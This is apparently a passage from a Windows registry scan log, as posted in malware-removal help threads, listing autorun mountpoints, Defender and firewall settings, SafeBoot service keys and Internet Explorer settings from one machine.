[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{be588abb-4014-11e3-a4b8-806e6f6e6963}] : E:\AutoRun.exe     (AutoRun)
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{bea55568-4015-11e3-9139-889ffa1c8ff7}] : F:\AutoRun.exe     (AutoRun)
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{e80fe46a-85e2-11e3-a3a5-1c7508dfa56f}] : E:\AutoRun.exe     (AutoRun)

---------- | Windows

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\win.ini\Windows]
"MouseSpeed"=#USR:Control Panel\Mouse   
"MouseThreshold1"=#USR:Control Panel\Mouse   
"MouseThreshold2"=#USR:Control Panel\Mouse   
"SwapMouseButtons"=#USR:Control Panel\Mouse   
"Beep"=#USR:Control Panel\Sound   
"DoubleClickSpeed"=#USR:Control Panel\Mouse   
"CoolSwitch"=USR:Control Panel\Desktop   
"DoubleClickHeight"=#USR:Control Panel\Mouse   
"DoubleClickWidth"=#USR:Control Panel\Mouse   
"DragFullWindows"=USR:Control Panel\Desktop   
"InitialKeyboardIndicators"=USR:Control Panel\Keyboard   
"LowPowerActive"=#USR:Control Panel\Desktop   
"LowPowerTimeOut"=#USR:Control Panel\Desktop   
"PowerOffActive"=#USR:Control Panel\Desktop   
"PowerOffTimeOut"=#USR:Control Panel\Desktop   
"ScreenSaveActive"=#USR:Control Panel\Desktop   
"ScreenSaveTimeOut"=#USR:Control Panel\Desktop   
"SnapToDefaultButton"=#USR:Control Panel\Mouse   
""=USR:Software\Microsoft\Windows NT\CurrentVersion\Windows   
"Spooler"=#SYS:Microsoft\Windows NT\CurrentVersion\Windows   
"TRANSMISSIONRETRYTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEFAULTSEPARATEVDM"=\\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\WOW   
"APPINIT_DLLS"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEVICENOTSELECTEDTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"SWAPDISK"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\system.ini\Boot]
""=SYS:Microsoft\Windows NT\CurrentVersion\WOW\boot   
"ScreenSaverActive"=USR:Control Panel\Desktop   
"ScreenSaverIsSecure"=USR:Control Panel\Desktop   
"SCRNSAVE.EXE"=USR:Control Panel\Desktop   
"Shell"=SYS:Microsoft\Windows NT\CurrentVersion\Winlogon   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\IniFileMapping\win.ini\Windows]
"MouseSpeed"=#USR:Control Panel\Mouse   
"MouseThreshold1"=#USR:Control Panel\Mouse   
"MouseThreshold2"=#USR:Control Panel\Mouse   
"SwapMouseButtons"=#USR:Control Panel\Mouse   
"Beep"=#USR:Control Panel\Sound   
"DoubleClickSpeed"=#USR:Control Panel\Mouse   
"CoolSwitch"=USR:Control Panel\Desktop   
"DoubleClickHeight"=#USR:Control Panel\Mouse   
"DoubleClickWidth"=#USR:Control Panel\Mouse   
"DragFullWindows"=USR:Control Panel\Desktop   
"InitialKeyboardIndicators"=USR:Control Panel\Keyboard   
"LowPowerActive"=#USR:Control Panel\Desktop   
"LowPowerTimeOut"=#USR:Control Panel\Desktop   
"PowerOffActive"=#USR:Control Panel\Desktop   
"PowerOffTimeOut"=#USR:Control Panel\Desktop   
"ScreenSaveActive"=#USR:Control Panel\Desktop   
"ScreenSaveTimeOut"=#USR:Control Panel\Desktop   
"SnapToDefaultButton"=#USR:Control Panel\Mouse   
"TRANSMISSIONRETRYTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEFAULTSEPARATEVDM"=\\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\WOW   
"APPINIT_DLLS"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEVICENOTSELECTEDTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"SWAPDISK"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\IniFileMapping\system.ini\Boot]
""=SYS:Microsoft\Windows NT\CurrentVersion\WOW\boot   
"ScreenSaverActive"=USR:Control Panel\Desktop   
"ScreenSaverIsSecure"=USR:Control Panel\Desktop   
"SCRNSAVE.EXE"=USR:Control Panel\Desktop   
"Shell"=SYS:Microsoft\Windows NT\CurrentVersion\Winlogon   

[HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems]
"windows"=%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16

---------- | Security center

[HKLM\SOFTWARE\Microsoft\Security Center]
"cval"=1

[HKLM\SOFTWARE\Microsoft\Security Center\svc]
"VistaSp1"=128920218544262440
"AntiVirusOverride"=0
"AntiSpywareOverride"=0
"FirewallOverride"=0

[HKLM\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=1
"DisableRoutinelyTakingAction"=0
"ProductStatus"=0
"InstallTime"=0x4BFECC367F7CCD01

[HKLM\Software\WOW6432Node\Microsoft\Windows Defender]
"DisableAntiSpyware"=0
"DisableRoutinelyTakingAction"=1

[HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall"=1

[HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=1

[HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall"=1


---------- | Safeboot

[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppInfo]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EFS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\KeyIso]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NTDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Power]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ProfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\RpcEptMapper]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sacsvr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SWPRV]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TabletInputService]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TBS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TrustedInstaller]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vmms]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\volmgr.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\volmgrx.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfPf]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfRd]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{533C5B84-EC70-11D2-9505-00C04F79DEAF}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{D48179BE-EC20-11D1-B6B8-00C04FA372A7}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppInfo]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BFE]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bowser]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dfsc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dot3Svc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Eaphost]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EFS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\IKEEXT]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\KeyIso]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MPSDrv]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MPSSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mrxsmb]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mrxsmb10]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mrxsmb20]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MsMpSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NativeWifiP]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ndiscap]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\netprofm]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NlaSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Nsi]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\nsiproxy.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NTDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PolicyAgent]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Power]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ProfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdbss]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpencdd.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcEptMapper]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sacsvr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCardSvr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SWPRV]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TabletInputService]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TBS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TrustedInstaller]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VaultSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vmms]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\volmgr.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\volmgrx.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinDefend]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wlansvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfPf]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfRd]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfUsbccidDriver]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{50DD5230-BA8A-11D1-BF5D-0000F805F530}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{533C5B84-EC70-11D2-9505-00C04F79DEAF}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{D48179BE-EC20-11D1-B6B8-00C04FA372A7}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}]

---------- | Winsock (Whitelist)


---------- | Hosts











[32] More lines

---------- | @

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger"=yes
"Anchor Underline"=yes
"Cache_Update_Frequency"=Once_Per_Session
"Display Inline Images"=yes
"Do404Search"=0x01000000
"Local Page"=C:\Windows\system32\blank.htm
"Save_Session_History_On_Exit"=no
"Show_FullURL"=no
"Show_StatusBar"=yes
"Show_ToolBar"=yes
"Show_URLinStatusBar"=yes
"Show_URLToolBar"=yes
"Use_DlgBox_Colors"=yes
"Search Page"=http://www.google.com
"XMLHTTP"=1
"NoUpdateCheck"=1
"UseClearType"=no
"Enable Browser Extensions"=yes
"Play_Background_Sounds"=yes
"Play_Animations"=yes
"Start Page"=http://www.google.com/
"CompatibilityFlags"=0
"FullScreen"=no
"Search Bar"=http://www.google.com
"Default_Search_URL"=http://www.google.com
"Window_Placement"=0x2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF720000007200000092030000CA020000
"IE8RunOnceLastShown"=1
"IE8RunOnceLastShown_TIMESTAMP"=0x90F45ABA4F7CCD01
"IE8TourShown"=1
"IE8TourShownTime"=0x33D279BB4F7CCD01
"DisableScriptDebuggerIE"=yes
"Start Page Redirect Cache"=http://fr.msn.com/?ocid=iehp
"Start Page Redirect Cache_TIMESTAMP"=0x59C17261597CCD01
"Start Page Redirect Cache AcceptLangs"=fr-FR
"IE9RunOncePerInstallCompleted"=1
"IE9RunOnceCompletionTime"=0xD4AAB366597CCD01
"IE9TourShown"=1
"IE9TourShownTime"=0xD4AAB366597CCD01
"IconCache"=v67ihhz
"DownloadWindowPlacement"=0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
"Default_Page_URL"=http://www.google.com
"ApplicationTileImmersiveActivation"=1
"AssociationActivationMode"=0
"OperationalData"=5
"IE10RunOncePerInstallCompleted"=1
"IE10RunOnceCompletionTime"=0xAAAFFE834135CF01
"IE10TourShown"=1
"IE10TourShownTime"=0xAAAFFE834135CF01
"Use Search Asst"=yes
"ImageStoreRandomFolder"=zy6que3
"Isolation"=PMIL
"DoNotTrack"=1
"AutoHide"=yes
"IE10TourNoShow"=1
"Move System Caret"=no
"PlaySounds"=0
"Expand Alt Text"=no
"UseSWRender"=0
"Enable AutoImageResize"=yes
"EnableAlternativeCodec"=yes
"Show image placeholders"=0
"GotoIntranetSiteForSingleWordEntry"=0
"UseThemes"=1
"Friendly http errors"=yes
"Error Dlg Displayed On Every Error"=no
"NotifyDownloadComplete"=yes
"NscSingleExpand"=0
"SmoothScroll"=1
"DOMStorage"=1
"MixedContentBlockImages"=0

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"=http://www.google.com
"Default_Search_URL"=http://www.google.com

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Internet Explorer\SearchURL]
""=http://www.google.com/search?q=%s
"Default"=http://www.google.com

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Internet settings]
"IE5_UA_Backup_Flag"=5.0
"User Agent"=Mozilla/4.0 (compatible; MSIE; Win32)
"EmailName"=User@
"PrivDiscUiShown"=1
"EnableHttp1_1"=1
"WarnOnIntranet"=1
"MimeExclusionListForCache"=multipart/mixed multipart/x-mixed-replace multipart/x-byteranges 
"AutoConfigProxy"=wininet.dll
"UseSchannelDirectly"=0x01000000
"WarnOnPost"=0x01000000
"UrlEncoding"=0
"SecureProtocols"=2720
"PrivacyAdvanced"=0
"ZonesSecurityUpgrade"=0x8FDC824DD1F6CE01
"DisableCachingOfSSLPages"=0
"WarnonZoneCrossing"=0
"CertificateRevocation"=1
"EnableNegotiate"=1
"MigrateProxy"=1
"ProxyEnable"=0
"EnableAutodial"=0
"SyncMode5"=4
"GlobalUserOffline"=0
"DisableIDNPrompt"=0
"EnablePunycode"=1
"ShowPunycode"=0
"ProxyHttp1.1"=1
"EnforceP3PValidity"=0
"WarnOnPostRedirect"=1
"WarnonBadCertRecving"=1
"ProxyOverride"=*.local
"WarNonBadCertReceving"=1
"WarNonHTTPSToHTTPRedirect"=1

[HKLM\Software\Microsoft\Internet Explorer\Main]
"AutoHide"=yes
"Security Risk Page"=about:SecurityRisk
"Extensions Off Page"=about:NoAdd-ons
"Default_Search_URL"=http://www.google.com
"Default_Page_URL"=http://www.google.com
"Anchor_Visitation_Horizon"=0x01000000
"Cache_Percent_of_Disk"=0x0A000000
"Placeholder_Width"=0x1A000000
"Placeholder_Height"=0x1A000000
"Default_Secondary_Page_URL"=
"Use_Async_DNS"=yes
"Start Page"=http://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130895403744043703&GUID=93FD7B15-3E62-0D3B-60D1-2C3481FEDA67
"Local Page"=C:\Windows\System32\blank.htm
"Search Page"=http://www.google.com
"Delete_Temp_Files_On_Exit"=yes
"Enable_Disk_Cache"=yes
"Check_Associations"=yes
"ApplicationTileImmersiveActivation"=1
"AssociationActivationMode"=0
"x86AppPath"=C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

[HKLM\Software\Microsoft\Internet Explorer\AboutURLs]
"blank"=res://mshtml.dll/blank.htm
"NoAdd-onsInfo"=res://ieframe.dll/noaddoninfo.htm
"InPrivate"=res://ieframe.dll/inprivate_win7.htm
"NavigationFailure"=res://ieframe.dll/navcancl.htm
"NoAdd-ons"=res://ieframe.dll/noaddon.htm
"Home"=270
"PostNotCached"=res://ieframe.dll/repost.htm
"DesktopItemNavigationFailure"=res://ieframe.dll/navcancl.htm
"NavigationCanceled"=res://ieframe.dll/navcancl.htm
"SecurityRisk"=res://ieframe.dll/securityatrisk.htm
"Compat"=res://mshtml.dll/compat.htm

[HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

[HKLM\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes]
"mosaic"=http://
"www"=http://
"home"=http://
"ftp"=ftp://

[HKLM\Software\Microsoft\Windows\CurrentVersion\Internet settings]
"EnablePunycode"=1
"CodeBaseSearchPath"=CODEBASE
"WarnOnIntranet"=1
"MinorVersion"=0
"ActiveXCache"=C:\Windows\Downloaded Program Files

[HKLM\Software\WOW6432Node\Microsoft\Internet Explorer\Main]
"AutoHide"=yes
"Security Risk Page"=about:SecurityRisk
"Extensions Off Page"=about:NoAdd-ons
"Default_Search_URL"=http://www.google.com
"Default_Page_URL"=http://www.google.com
"Anchor_Visitation_Horizon"=0x01000000
"Cache_Percent_of_Disk"=0x0A000000
"Placeholder_Width"=0x1A000000
"Placeholder_Height"=0x1A000000
